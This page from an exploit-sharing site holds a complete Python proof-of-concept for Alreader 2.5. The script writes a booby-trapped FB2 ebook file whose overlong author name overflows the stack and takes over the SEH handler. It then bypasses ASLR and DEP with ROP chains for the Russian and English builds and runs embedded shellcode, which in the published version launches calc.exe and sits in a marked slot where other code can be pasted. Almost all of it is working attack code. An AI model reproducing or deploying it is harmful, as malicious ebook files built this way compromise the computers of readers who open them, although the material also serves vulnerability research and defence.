0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass) Vulnerability
[#!/usr/bin/env python
#*************************************************************************************************************
# Exploit Title: Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
# Date: 25.10.2015
# Category: Local Exploit
# Exploit Author: g00dv1n
# Contact: g00dv1n.private@gmail.com
# Version: 2.5
# Tested on: Windows XP SP3 / Windows 7 / Windows 8
# Vendor Homepage: http://www.alreader.com/index.php?lang=en
# Software Link (ENG): http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
# Software Link (RU): http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
# CVE:
# Description:
# Alreader 2.5 its free FB2 reader for Windows.
# FB2 format its just XML. FB2 contain <author> <first-name> </first-name> </author> block.
# Overflow occurs if you create a long name of the author.
# App used WCHAR (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
# For example 41 41 - 00 41 00 41
# So We should use UTF-16.
#
# Also, we can use single null byte in payload.
#
#
#
# Instructions:
# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
# 2. Run Alreader.exe
# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
# 4. Enjoy running Calc.exe
#
# Exploit owerview:
# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
# run Shellcode.
#
# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload
# ( It is necessary to adjust the offset in different systems .)
# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP
# ( It is necessary to adjust the offset in different systems .)
# Then the control get ROP chain .
#
# Program have Russian (RU) and English (Eng) versions.
# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
# For a combination of two versions into one exploit I place two ROP chains one after another.
# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs arises yet another exepiton and Call ADD ESP, 808h.
# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
# With these tricks, the exploit works correctly for both versions.
#
# Below is ANSI-diagram of the payload:
#
# =-------------------------=
# | gdvn | just fan magic bytes
# |-------------------------|
# | |
# | jmp from SEH adress | x 500 Spray Andress to Jump from oveeride SEH
# | | (ADD ESP, 808h RETN 4)
# |-------------------------|
# | |
# | ROP NOP | x 500 Spray ROP NOP (RETN)
# | |
# |-------------------------|
# | |
# | ROP chain for |
# | RU version |
# | |
# |-------------------------|
# | SHELLCODE | Run Calc.exe
# |-------------------------|
# | |
# | ROP NOP | x 250 Spray ROP NOP (RETN)
# | |
# |-------------------------|
# | |
# | ROP chain for |
# | ENG version |
# | |
# |-------------------------|
# | SHELLCODE | Run Calc.exe
# |-------------------------|
# | |
# | ROP chain for |
# | ENG version |
# | |
# |-------------------------|
# | |
# | |
# | Junk | 'A' x 6000
# | |
# | |
# =-------------------------=
#
#
#
#
#
#**************************************************************************************************************
#######################################################################################################
from struct import *
#######################################################################################################
file_result = "AlReader-fb2-PoC-exploit.fb2"
########################################################################################################
fuz_text = '' # init fuzzy string
jmp_to = pack('<I',0x00442391 ) # 0x00442391 ADD ESP, 808h RETN 4
ret_NOP = pack('<I',0x00448147 ) # RETN
##################################### START CREATE ROP CHAINs ############################################
fuz_text += 'gdvn' # magic init bytes
fuz_text += jmp_to * 500 # spray adr
fuz_text += ret_NOP * 500 # spray RETN adr
####################################### ROP CHAIN FOR RUS VERSION ########################################
# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr
# EBP = ptr to unicode 'kernel32.dll'
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC8FC ) # 0x004FC8FC GetModuleHandleW adr
kernel32_u = pack('<I',0x0560944 ) # 0x0560944 ptr to unicode 'kernel32.dll'
#0x004904a6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x004904a6 ) + module_handlew_adr + ret_adr_after + kernel32_u
fuz_text += '\x41' * 4
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
fuz_text += '\x41' * 28 # correct after ADD ESP,30
#Junk
#################################################
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
#################################################
#EAX = kernel32 base adr
# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x004904A8 ) + get_proc_adr + ret_adr_after
fuz_text += '\x41' * 8
fuz_text += pack('<I',0x004b9e9e ) # 0x004b9e9e : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
fuz_text += 'VirtualProtect' + '\x00'
fuz_text += '\x41' * 17 # correct ESP pointer
########################################################
# Prepare registrs for Virtual protect call
# EDI = ROP NOP
# ESI = VirtualProtect adr
# EBP = Ret adr
# ESP = auto
# EBX = 1
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)
# Now in EAX VP adr
fuz_text += pack('<I',0x00489cdd ) # 0x00489cdd, # PUSH EAX # POP ESI # RETN
fuz_text += pack('<I',0x004a6392 ) # 0x004a6392, # POP EBX # RETN
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
fuz_text += pack('<I',0x004e7d31 ) # 0x004e7d31, # SUB EBX,5DE58BD0 # RETN # EBX = 1
fuz_text += pack('<I',0x004fc23c ) # 0x004fc23c, # XOR EDX,EDX # RETN # EDX = 0
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
fuz_text += pack('<I',0x0048c064 ) # 0x0048c064, # POP ECX # RETN
fuz_text += pack('<I',0x00629eea ) # 0x00629eea, # &Writable location
fuz_text += pack('<I',0x00487d6a ) # 0x00487d6a, # POP EDI # RETN
fuz_text += pack('<I',0x004f4401 ) # 0x004f4401, # RETN (ROP NOP)
fuz_text += pack('<I',0x004e6379 ) # 0x004e6379, # POP EBP # RETN
ret_adr_after = pack('<I',0x004f831c ) # ret adr # 0x004f831c # ADD ESP,24 # RETN
fuz_text += ret_adr_after
fuz_text+= pack('<I',0x004ecfab ) # 0x004ecfab, # PUSHAD # RETN
fuz_text += '\x41' * 32 # Correct poiter to ESP
fuz_text += pack('<I',0x004a37bd ) # 0x004a37bd : # jmp esp
fuz_text += '\x90' * 16 # NOP's :-)
##################################### END ROP CHAIN #########################################
#############################################################################################
#PASTE SHELLCODE HERE
# Run Calc
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7");
fuz_text += shellcode
#############################################################################################
fuz_text += ret_NOP * 250 # spray RETN adr
#############################################################################################
############################### ROP CHAIN FOR ENG VERSION ###################################
# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr
# EBP = ptr to unicode 'kernel32.dll'
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC85C ) # 0x004FC85C GetModuleHandleW adr
kernel32_u = pack('<I',0x00560724 ) # 0x00560724 ptr to unicode 'kernel32.dll'
#0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x00488ed6 ) + module_handlew_adr + ret_adr_after + kernel32_u
fuz_text += '\x41' * 4
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
fuz_text += '\x41' * 28 # correct after ADD ESP,30
#Junk
#################################################
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
#################################################
#EAX = kernel32 base adr
# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x00488ed6 ) + get_proc_adr + ret_adr_after
fuz_text += '\x41' * 8
fuz_text += pack('<I',0x004b9dfe ) # 0x004b9dfe : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
fuz_text += 'VirtualProtect' + '\x00'
fuz_text += '\x41' * 17 # correct ESP pointer
########################################################
# Prepare registrs for Virtual protect call
# EDI = ROP NOP
# ESI = VirtualProtect adr
# EBP = Ret adr
# ESP = auto
# EBX = 1
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)
# Now in EAX VP adr
fuz_text += pack('<I',0x00489c3d ) # 0x00489c3d, # PUSH EAX # POP ESI # RETN
fuz_text += pack('<I',0x00481c40 ) # 0x00481c40, # POP EBX # RETN
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
fuz_text += pack('<I',0x004e7c91 ) # 0x004e7c91, # SUB EBX,5DE58BD0 # RETN # EBX = 1
fuz_text += pack('<I',0x004fc19c ) # 0x004fc19c, # XOR EDX,EDX # RETN
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
fuz_text += pack('<I',0x004f39dc ) # 0x004f39dc, # POP ECX # RETN
fuz_text += pack('<I',0x0062909d ) # 0x0062909d, # &Writable location
fuz_text += pack('<I',0x00495df4 ) # 0x00495df4, # POP EDI # RETN
fuz_text += pack('<I',0x00483a02 ) # 0x00483a02, # RETN (ROP NOP)
fuz_text += pack('<I',0x004fb3c6 ) # 0x004fb3c6, # POP EBP # RETN
ret_adr_after = pack('<I',0x004a8ee8 ) # ret adr # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += ret_adr_after
fuz_text+= pack('<I',0x004b3ded ) # 0x004b3ded, # PUSHAD # RETN
fuz_text += '\x41' * 32 # Correct poiter to ESP
fuz_text += pack('<I',0x004757a7 ) # 0x004757a7 : # jmp esp
fuz_text += '\x90' * 16 # NOP's :-)
fuz_text += shellcode
##############################################################################################
fuz_text += '\x41' * 6000 # final junk
################################ GENERATE utf-16 fb2 file ####################################
start = '''
<?xml version="1.0" encoding="unicode-utf_16"?>
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
<description>
<title-info>
<author>
<first-name>
'''
end = '''
<middle-name/>
<last-name/>
</author>
<book-title>EXPLOIT TEST</book-title>
</title-info>
</description>
</FictionBook>
'''
start_u = start.encode('utf-16')
end_u = end.encode('utf-16')
fout = open(file_result, 'wb')
fout.write(start_u)
fout.close()
fout = open(file_result,'ab')
fout.write(fuz_text)
fout.close()
fout = open(file_result,'ab')
fout.write(end_u)
fout.close()
print "[*] File successfully created !!\n\n"
# 0day.today [2025-01-06] #